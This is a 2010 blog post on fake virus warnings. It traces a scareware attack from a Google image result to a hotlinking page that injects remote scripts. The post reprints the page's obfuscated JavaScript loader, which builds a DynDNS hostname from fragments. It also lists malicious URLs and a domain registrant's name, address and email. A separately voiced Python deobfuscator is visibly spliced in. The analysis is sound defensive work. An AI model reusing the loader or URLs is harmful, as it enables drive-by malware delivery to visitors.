Fake virus warnings - John C. Kirk

Oct. 29th, 2010

08:55 pm - Fake virus warnings

Someone called me earlier because she had a big virus warning on her screen. This was actually a hoax (a web page trying to install malware), so it's worth being aware of it so that you know what to recognise.

At the moment, you can duplicate this if you go to this page:
hxxp://www3.new-protectionsoft23.in/?4ec0=%9B%EC%E0%97k%A0%96%B0c%96%E2%D8%D8%A2%96%9A%D5%E2%AB%A3%95%DA%E8%9Ep%5E%9A%9Fh%C8%9Ch%A8%D8%A8iR
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.

The main webpage disappears, and instead you get a message box:

[Screenshot: "Message from webpage" dialog box]

Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".

Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:

[Screenshot: fake "Security Analysis" scan window]

As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!

If you try to get rid of this window, it nags you to stick around:

[Screenshot: "Don't leave me!" nag prompt]

If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:

[Screenshot: "Download" file prompt]

That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.

In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.

So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.

The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:

1. Go to Google.

2. Do an image search for "map of central america" (without the quotes).

3. The 12th image (at the time of writing) looks like this:
[Image: "Central America" map thumbnail]
and it takes you to:
hxxp://america.film.bigbestmovie.com/mapofcentralamerica/
(Again, I've mangled the URL to avoid accidental clicking.)

I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.

The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
http://www.godsgeography.com/centralamerica/central1.jpg
as used on this page:
http://www.godsgeography.com/centralamerica/central1.html
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.

Looking at the HTML source for the bigbestmovie page, it has 3 blocks of JavaScript at the start of the <body> section:

<script language='JavaScript' >
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var y1 = "<s"+"cript language='JavaScript' src='"+x1+"' ><"+"/"+"script>";
document.write(y1);
</script>
<script language='JavaScript' >
var b1="ucy";
var b2="gan";
var b3="ijo";
var b4=".dy";
var b5="ndn";
var b6="s-s";
var b7="erv";
var b8="er.";
var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
document.write(y);
</script>
<script src="/nlc/in.cgi?14"></script>

The first 2 get replaced at runtime, so the block then looks like this:

<script language='JavaScript' src='/partner.js?frm=GOOGLE&default_keyword=DOCTITLE' ></script>
<script language='JavaScript' src='hxxp://ucyganijo.dyndns-server.com/partner.js?num=114&frm=GOOGLE&default_keyword=DOCTITLE' ></script>
<script src="/nlc/in.cgi?14"></script>

The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this (bigbestmovie.com) page. So, the first line would really look something like this:

hxxp://america.film.bigbestmovie.com/partner.js?frm=http%3A%2F%2Fwww.google.co.uk%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.godsgeography.com%2Fcentralamerica%2Fcentral1.jpg%26imgrefurl%3Dhttp%3A%2F%2Famerica.film.bigbestmovie.com%2Fmapofcentralamerica%2F%26usg%3D__y6l4u91mTPtVWxuGqWCeb3AtMV4%3D%26h%3D340%26w%3D402%26sz%3D43%26hl%3Den%26start%3D0%26zoom%3D1%26tbnid%3DVzeOZ_s6A3kgEM%3A%26tbnh%3D157%26tbnw%3D186%26prev%3D%2Fimages%253Fq%253Dmap%252Bof%252Bcentral%252Bamerica%2526um%253D1%2526hl%253Den%2526biw%253D1131%2526bih%253D659%2526tbs%253Disch%3A1%26um%3D1%26itbs%3D1%26iact%3Drc%26dur%3D312%26ei%3Ds_HKTNOYF5GD4Ab47LTcDA%26oei%3Ds_HKTNOYF5GD4Ab47LTcDA%26esq%3D1%26page%3D1%26ndsp%3D12%26ved%3D1t%3A429%2Cr%3A11%2Cs%3A0%26tx%3D112%26ty%3D119&default_keyword=map%20of%20central%20america
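As an added illustration (my own code, not anything from the post or the bigbestmovie page), here is a small static deobfuscator that reassembles the script src values from loaders like the ones above without executing any of the page's JavaScript. It stands in GOOGLE and DOCTITLE for document.referrer and document.title, as the post does, and treats encodeURIComponent as transparent, so the reconstructed URLs show the placeholder rather than a percent-encoded value.

```python
import re

# Constructed sample: the three loaders quoted above, condensed onto fewer lines.
SAMPLE = """<script language='JavaScript' >
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var y1 = "<s"+"cript language='JavaScript' src='"+x1+"' ><"+"/"+"script>";
document.write(y1);
</script>
<script language='JavaScript' >
var b1="ucy"; var b2="gan"; var b3="ijo"; var b4=".dy"; var b5="ndn";
var b6="s-s"; var b7="erv"; var b8="er."; var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
document.write(y);
</script>
<script src="/nlc/in.cgi?14"></script>"""

# Tokens of a '+'-joined expression: quoted literal, encodeURIComponent(...), identifier.
TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|encodeURIComponent\(([^)]*)\)|([\w.]+)""")
ASSIGN = re.compile(r"var\s+(\w+)\s*=\s*(.*?);")
WRITE = re.compile(r"document\.write\((\w+)\)")
SRC = re.compile(r"""<script[^>]*\bsrc=['"]([^'"]+)['"]""")
# Runtime DOM values are replaced by the same placeholders the post uses.
PLACEHOLDERS = {"document.referrer": "GOOGLE", "document.title": "DOCTITLE"}

def resolve(expr, env):
    """Evaluate a JS string concatenation statically, never executing the page."""
    out = []
    for m in TOKEN.finditer(expr):
        if m.lastindex == 3:                 # encodeURIComponent(...) left transparent
            out.append(resolve(m.group(3), env))
        elif m.lastindex == 4:               # identifier: DOM placeholder or earlier var
            name = m.group(4)
            out.append(PLACEHOLDERS[name] if name in PLACEHOLDERS else env[name])
        else:                                # quoted literal
            out.append(m.group(m.lastindex))
    return "".join(out)

def script_sources(html):
    """Return every script src the page would load: injected ones, then literal tags."""
    env = {}
    for name, expr in ASSIGN.findall(html):  # b1..b9, c, x, y ... in source order
        env[name] = resolve(expr, env)
    srcs = [src for var in WRITE.findall(html) for src in SRC.findall(env[var])]
    return srcs + SRC.findall(html)

if __name__ == "__main__":
    print("\n".join(script_sources(SAMPLE)))
```

Run against the sample it lists the two document.write-injected loaders with the DynDNS hostname reassembled from b1..b9, followed by the literal in.cgi tag, which is what you want to feed into a blocklist or a firewall log search rather than letting the page run.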

The second JavaScript file is a bit odd, because the server name changed. The firewall logs referred to:
hxxp://agosagyvux.dyndns-blog.com/
rather than:
hxxp://ucyganijo.dyndns-server.com/
DynDNS.com is a legitimate site, which sells sub-domains in "dyndns-blog.com" and "dyndns-server.com" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. Maybe the dodgy code is being hopped around to different machines on a botnet? That being the case, it's curious that the bigbestmovie.com page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).

I've tried to download the partner.js files, but if I just request the files themselves (no parameters) then I get a 404 error. If I supply the full address from the firewall log, I can download something. However, the one from bigbestmovie.com is a 0 byte file, and the one from the DynDNS site is only 2 bytes (appearing as whitespace in Notepad). This may mean that there's something sneaky going on, so you only get the real JavaScript file if there's a referring page, but I can't find any copies in my cache. Alternatively, they may both be red herrings, with the real work being done in the CGI file, e.g. that might be generating new JavaScript on the fly. Any suggestions would be welcome.

If I go to:
http://www3.new-protectionsoft23.in/
then it redirects me to:
http://www.welcomewave.net/?uid=7&isRedirected=1
which just has a list of YouTube videos. This seems like an overtly innocent site, i.e. it's deliberately intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?

If I pass a parameter to the site, as above:
hxxp://www3.new-protectionsoft23.in/?4ec0=%9B%EC%E0%97k%A0%96%B0c%96%E2%D8%D8%A2%96%9A%D5%E2%AB%A3%95%DA%E8%9Ep%5E%9A%9Fh%C8%9Ch%A8%D8%A8iR
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
www1.smart-yourholder.in
I noticed that this URL is similar to the one above, i.e. they're both Indian sites containing numbers and punctuation. According to whois for India, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013
dmallen51@gmail.com

On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
www1.bestdrive-keeper.in
www2.netprotection-soft48.in
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.

I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? I don't know whether the bigbestmovie.com site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. Again, any suggestions would be welcome.

Ah well, if nothing else it's been an interesting exercise.

Comments:

From: billyabbott
Date: November 1st, 2010 12:08 am (UTC)
Your initial link is flagged by Firefox as a known malware site and has also now been taken down - the domain isn't findable any more from my machine.

The thing I liked most when I went to the bigbestmovie site (which didn't load for me on Firefox OSX - just hung trying to load something) was that a site it was trying to get something from was qooglesearch.com, which is remarkably effective at fooling when you see it in the status bar.

From: tommy50702
Date: November 9th, 2014 01:35 pm (UTC)
I encountered this twice already.